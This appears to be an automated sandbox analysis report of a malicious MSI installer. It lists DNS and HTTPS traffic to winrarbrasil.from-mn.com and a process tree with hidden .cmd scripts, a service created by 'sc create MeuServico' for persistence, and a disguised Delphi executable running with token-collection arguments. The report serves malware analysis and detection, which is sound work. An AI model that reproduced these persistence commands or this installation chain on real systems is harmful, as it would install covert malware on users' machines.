                                                                      Jun 1, 2024 19:06:49.509778023 CEST53559551.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:59.503633976 CEST53558041.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:08:16.124171972 CEST53639241.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:08:59.087101936 CEST138138192.168.2.4192.168.2.255
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jun 1, 2024 19:04:46.250566959 CEST | 192.168.2.4 | 1.1.1.1 | c22b | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 1, 2024 19:04:45.824647903 CEST | 192.168.2.4 | 1.1.1.1 | 0x576d | Standard query (0) | winrarbrasil.from-mn.com | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:04:45.824785948 CEST | 192.168.2.4 | 1.1.1.1 | 0xf932 | Standard query (0) | winrarbrasil.from-mn.com | 65 | IN (0x0001) | false
Jun 1, 2024 19:04:49.382695913 CEST | 192.168.2.4 | 1.1.1.1 | 0x4d7e | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:04:49.382900000 CEST | 192.168.2.4 | 1.1.1.1 | 0xd83f | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Jun 1, 2024 19:06:49.502377033 CEST | 192.168.2.4 | 1.1.1.1 | 0x48c3 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:06:49.502505064 CEST | 192.168.2.4 | 1.1.1.1 | 0xb3d2 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 1, 2024 19:04:45.979582071 CEST | 1.1.1.1 | 192.168.2.4 | 0x576d | No error (0) | winrarbrasil.from-mn.com | | 45.90.123.184 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:04:49.389683008 CEST | 1.1.1.1 | 192.168.2.4 | 0x4d7e | No error (0) | www.google.com | | 172.217.18.4 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:04:49.390152931 CEST | 1.1.1.1 | 192.168.2.4 | 0xd83f | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Jun 1, 2024 19:06:49.509762049 CEST | 1.1.1.1 | 192.168.2.4 | 0x48c3 | No error (0) | www.google.com | | 216.58.206.68 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 19:06:49.509778023 CEST | 1.1.1.1 | 192.168.2.4 | 0xb3d2 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
• winrarbrasil.from-mn.com
• https:
• slscr.update.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 45.90.123.184 | 443 | 7652 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 17:04:46 UTC | 693 | OUT | GET /clientes/inspecionando.php HTTP/1.1
Host: winrarbrasil.from-mn.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-06-01 17:04:47 UTC | 166 | IN | HTTP/1.1 200 OK
Date: Sat, 01 Jun 2024 17:04:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 45.90.123.184 | 443 | 7652 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 17:04:47 UTC | 630 | OUT | GET /favicon.ico HTTP/1.1
Host: winrarbrasil.from-mn.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://winrarbrasil.from-mn.com/clientes/inspecionando.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-06-01 17:04:47 UTC | 180 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:04:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 287
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-06-01 17:04:47 UTC | 287 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 69 6e 72 61 72 62 72 61 73 69 6c 2e 66 72 6f 6d 2d 6d 6e 2e 63 6f 6d 20 50 6f
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at winrarbrasil.from-mn.com Po


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49746 | 45.90.123.184 | 443 | 7652 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 17:05:12 UTC | 776 | OUT | GET /clientes/inspecionando.php HTTP/1.1
Host: winrarbrasil.from-mn.com
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://winrarbrasil.from-mn.com/clientes/inspecionando.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-06-01 17:05:13 UTC | 166 | IN | HTTP/1.1 200 OK
Date: Sat, 01 Jun 2024 17:05:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49747 | 20.114.59.183 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-06-01 17:05:15 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-06-01 17:05:15 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: b41c56b4-098e-4d01-a114-9d67188daf7e
MS-RequestId: d39f0281-bf57-4edd-935a-5ead5a271f24
MS-CV: qCn08b8yBkacdBwu.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Sat, 01 Jun 2024 17:05:14 GMT
Connection: close
Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49753 | 20.114.59.183 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-06-01 17:05:52 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-06-01 17:05:52 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440"
MS-CorrelationId: 12b9c627-184a-42bd-8f64-7de134e96b2f
MS-RequestId: 034fbd7b-2cd5-405d-9511-056788b67cbf
MS-CV: P/YHc4oGFE6Rlavw.0
X-Microsoft-SLSClientCache: 1440
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Sat, 01 Jun 2024 17:05:52 GMT
Connection: close
Content-Length: 25457


                                                                      Target ID:0
                                                                      Start time:13:04:35
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\CrzA2u67LQ.msi"
                                                                      Imagebase:0x7ff622680000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:13:04:36
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                      Imagebase:0x7ff622680000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:13:04:37
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6
                                                                      Imagebase:0x7f0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\Installer\MSI5DCF.tmp
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
                                                                      Imagebase:0xad0000
                                                                      File size:423'936 bytes
                                                                      MD5 hash:768B35409005592DE2333371C6253BC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\Installer\MSI5DEF.tmp
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                                                      Imagebase:0xae0000
                                                                      File size:423'936 bytes
                                                                      MD5 hash:768B35409005592DE2333371C6253BC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Antivirus matches:
                                                                      • Detection: 3%, ReversingLabs
                                                                      • Detection: 5%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:6
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
                                                                      Imagebase:0x7ff7fbe50000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:13:04:40
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:13:04:40
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:13:04:40
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
                                                                      Imagebase:0xdb0000
                                                                      File size:61'440 bytes
                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:sc start MeuServico
                                                                      Imagebase:0xdb0000
                                                                      File size:61'440 bytes
                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.2046975605.00000000008D1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:13:04:42
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff6eef20000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:15
                                                                      Start time:13:04:43
                                                                      Start date:01/06/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:16
                                                                      Start time:13:04:48
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:17
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:18
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000012.00000002.4174481109.0000000000901000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:19
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000002.4175193752.0000000000981000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:20
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.4175517301.0000000000911000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:21
                                                                      Start time:13:04:50
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000002.4164202689.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:23
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.4175775360.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:24
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000018.00000002.4174825409.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:25
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Has exited:false

                                                                      Target ID:26
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000002.4175519677.0000000000951000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      Target ID:29
                                                                      Start time:13:05:14
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Has exited:false

                                                                      Target ID:30
                                                                      Start time:13:05:14
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
